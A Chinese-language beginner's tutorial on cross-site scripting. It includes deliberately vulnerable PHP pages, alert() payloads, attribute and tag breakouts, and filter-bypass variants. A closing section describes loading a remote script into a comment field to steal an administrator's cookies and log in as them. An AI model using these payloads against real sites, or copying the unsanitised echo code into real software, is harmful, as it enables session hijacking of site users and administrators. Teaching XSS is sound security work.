0×01 前言:

[[118026]]

《xss攻擊手法》一開始在互聯(lián)網(wǎng)上資料并不多(都是現(xiàn)成的代碼，沒有從基礎(chǔ)的開始)，直到刺的《白帽子講WEB安全》和cn4rry的《XSS跨站腳本攻擊剖析與防御》才開始好轉(zhuǎn)。

我這里就不說什么xss的歷史什么東西了，xss是一門又熱門又不太受重視的Web攻擊手法，為什么會這樣呢，原因有下：

1、耗時間
2、有一定幾率不成功
3、沒有相應(yīng)的軟件來完成自動化攻擊
4、前期需要基本的html、js功底，后期需要扎實的html、js、actionscript2/3.0等語言的功底
5、是一種被動的攻擊手法
6、對website有http-only、crossdomian.xml沒有用

但是這些并沒有影響黑客對此漏洞的偏愛，原因不需要多，只需要一個。

Xss幾乎每個網(wǎng)站都存在，google、baidu、360等都存在。

0×02 原理:

首先我們現(xiàn)在本地搭建個PHP環(huán)境(可以使用phpstudy安裝包安裝)，然后在index.php文件里寫入如下代碼:

<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>XSS原理重現(xiàn)</title> 
</head> 
<body> 
<form action="" method="get"> 
<input type="text" name="xss_input"> 
<input type="submit"> 
</form> 
<hr> 
<?php 
$xss = $_GET['xss_input'];  
echo '你輸入的字符為<br>'.$xss;  
?> 
</body> 
</html> 
 

然后，你會在頁面看到這樣的頁面

我們試著輸入abcd123，得到的結(jié)果為

我們在看看源代碼

我們輸入的字符串被原封不動的輸出來了，那這里我們提出來一個假設(shè)，假設(shè)我們在搜索框輸入下面的代碼會出現(xiàn)什么呢？

<script>alert('xss')</script> 

如果按照上面的例子來說，它應(yīng)該存在第12行的[br]與[/boby]>之間，變成：

<br><script>alert('xss')</script></boby> 

之后，應(yīng)該會彈出對話框。

既然假設(shè)提出來，那我們來實現(xiàn)下這個假設(shè)成不成立吧。

我們輸入

<script>alert('xss')</script> 

得到的頁面為

成功彈窗，這個時候基本上就可以確定存在xss漏洞。

我們在看看源代碼

看來，我們的假設(shè)成功了，這節(jié)就說說XSS的原理，下面幾節(jié)說說xss的構(gòu)造和利用。

#p#

0×03 xss利用輸出的環(huán)境來構(gòu)造代碼 :

上節(jié)說了xss的原理，但是我們的輸出點不一在[ br ]和[ /boby ]里，可以出現(xiàn)在html標簽的屬性里，或者其他標簽里面。所以這節(jié)很重要，因為不一定 當(dāng)你輸入下面代碼就會出現(xiàn)彈窗。 

<script>alert('xss')</script> 

先貼出代碼:

<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>XSS利用輸出的環(huán)境來構(gòu)造代碼</title> 
</head> 
<body> 
<center> 
<h6>把我們輸入的字符串 輸出到input里的value屬性里</h6> 
<form action="" method="get"> 
<h6>請輸入你想顯現(xiàn)的字符串</h6> 
<input type="text" name="xss_input_value" value="輸入"><br> 
<input type="submit"> 
</form> 
<hr> 
<?php 
$xss = $_GET['xss_input_value'];  
if(isset($xss)){  
echo '<input type="text" value="'.$xss.'">';  
}else{  
echo '<input type="type" value="輸出">';  
}  
?> 
</center> 
</body> 
</html> 

下面是代碼的頁面

這段代碼的作用是把第一個輸入框的字符串，輸出到第二個輸入框，我們輸入1，那么第二個input里的value值就是1，下面是頁面的截圖和源代碼的截圖(這里我輸入下面的代碼來測試)

<script>alert('xss')</script> 

明顯的可以看到，并沒有彈出對話框，大家可能會疑惑為什么沒有彈窗呢，我們來看看源代碼

我們看到我們輸入的字符串被輸出到第15行input標簽里的value屬性里面，被當(dāng)成value里的值來顯現(xiàn)出來，所以并沒有彈窗，這時候我們該怎么辦呢？聰明的人已經(jīng)發(fā)現(xiàn)了可以在

<script>alert(&#039;xss&#039;)</script> 

前面加個">來閉合input標簽。所以應(yīng)該得到的結(jié)果為

成功彈窗了，我們在看看這時的頁面

看到后面有第二個input輸入框后面跟有">字符串，為什么會這樣呢，我們來看看源代碼

這時可以看到我們構(gòu)造的代碼里面有兩個">，第一個">是為了閉合input標簽，所以第二個">就被拋棄了，因為html的容錯性高，所以并沒有像php那樣出現(xiàn)錯誤，而是直接把多余的字符串來輸出了，有的人是個完美主義者，不喜歡有多余的字符串被輸出，這時該怎么辦呢？

這里我問大家一個問題，我之前說的xss代碼里，為什么全是帶有標簽的。難道就不能不帶標簽么？！答：當(dāng)然可以。既然可以不用標簽，那我們就用標簽里的屬性來構(gòu)造XSS，這樣的話，xss代碼又少，又不會有多余的字符串被輸出來。

還是這個環(huán)境，但是不能使用標簽，你應(yīng)該怎么做。想想input里有什么屬性可以調(diào)用js，html學(xué)的好的人，應(yīng)該知道了，on事件，對的。我們可以用on事件來進行彈窗，比如這個xss代碼 我們可以寫成

" onclick="alert('xss')  

這時，我們在來試試，頁面會發(fā)生什么樣的變化吧。

沒有看到彈窗啊，失敗了么？答案當(dāng)然是錯誤的，因為onclick是鼠標點擊事件，也就是說當(dāng)你的鼠標點擊第二個input輸入框的時候，就會觸發(fā)onclick事件，然后執(zhí)行alert('xss')代碼。我們來試試看

當(dāng)我點擊后，就出現(xiàn)了彈窗，這時我們來看看源代碼吧

第15行，value值為空，當(dāng)鼠標點擊時，就會彈出對話框。這里可能就會有人問了，如果要點擊才會觸發(fā)，那不是很麻煩么，成功率不就又下降了么。我來幫你解答這個問題，on事件不止onclick這一個，還有很多，如果你想不需要用戶完成什么動作就可以觸發(fā)的話，i可以把onclick改成

Onmousemove 當(dāng)鼠標移動就觸發(fā)

Onload 當(dāng)頁面加載完成后觸發(fā)

還有很多，我這里就不一一說明了，有興趣的朋友可以自行查詢下。

別以為就這樣結(jié)束了，還有一類環(huán)境不能用上述的方法，

那就是如果在[ textarea ]標簽里呢？！或者其他優(yōu)先級比script高的呢？

就下面這樣

這時我們該怎么辦呢？既然前面都說了閉合屬性和閉合標簽了，那能不能閉合完整的標簽?zāi)兀鸢甘强隙ǖ?。我們可以輸入下面的代碼就可以實現(xiàn)彈窗了。

</textarea><script>alert('xss')</script> 

#p#

0×04 過濾的解決辦法

假如說網(wǎng)站禁止過濾了script 這時該怎么辦呢，記住一句話，這是我總結(jié)出來的“xss就是在頁面執(zhí)行你想要的js”不用管那么多，只要能運行我們的js就OK，比如用img標簽或者a標簽。我們可以這樣寫

<img scr=1 onerror=alert('xss')>當(dāng)找不到圖片名為1的文件時，執(zhí)行alert('xss')  
<a href=javascrip:alert('xss')>s</a> 點擊s時運行alert('xss')  
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr來彈窗  
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>過濾了alert來執(zhí)行彈窗   

等等有很多的方法，不要把思想總局限于一種上面，記住一句話“xss就是在頁面執(zhí)行你想要的js”其他的管他去。(當(dāng)然有的時候還有管他…)

0×05 xss的利用

說了那么多，大家可能都以為xss就是彈窗，其實錯了，彈窗只是測試xss的存在性和使用性。

這時我們要插入js代碼了，怎么插呢？

你可以這樣

<script scr="js_url"></script> 

也可以這樣

<img src=x onerror=appendChild(createElement('script')).src='js_url' /> 

各種姿勢，各種插，只要鞥運行我們的js就OK。那運行我們的js有什么用呢？

Js可以干很多的事，可以獲取cookies(對http-only沒用)、控制用戶的動作(發(fā)帖、私信什么的)等等。

比如我們在網(wǎng)站的留言區(qū)輸入下面的代碼：

<script scr="js_url"></script> 

當(dāng)管理員進后臺瀏覽留言的時候，就會觸發(fā)，然后管理員的cookies和后臺地址還有管理員瀏覽器版本等等你都可以獲取到了，再用“桂林老兵cookie欺騙工具”來更改你的cookies，就可以不用輸入賬號 密碼 驗證碼 就可以以管理員的方式來進行登錄了。

至于不會js的怎么寫js代碼呢，放心網(wǎng)上有很多xss平臺，百度一下就可以看到了。頁面是傻瓜式的操作，這里就不再過多的說明了。

有興趣的朋友，下面是cn4rry給我的幾個xss平臺，大家可以自己鉆研與研究，也可以自己搭建

http://pan.baidu.com/s/1ntqOp4X

在發(fā)布此文章的時候，我特地和cn4rry談了一下，得到的結(jié)果是，我會繼續(xù)寫這個系列的。當(dāng)我把這個doc發(fā)給cn4rry的時候，他就直接來句“嗯 寫的比較基礎(chǔ)”，我本來的打算是寫一個xss入門的就可以了，我只是感覺 現(xiàn)在網(wǎng)上的文章從簡單開始介紹xss的比較少，都是在書里有

所以 我想在網(wǎng)上把他講的細點 xss入門就可以了，后面的路 就可以自己摸索了

但是和他談過后，感覺還是要繼續(xù)寫下去，因為“xss盲打”“xss編碼繞過”“fuzzing xss”等等，如果是自己慢慢琢磨的話，需要較長的時間，所以我打算每過一段時間就會推出下一個xss的文章，寫個系列出來。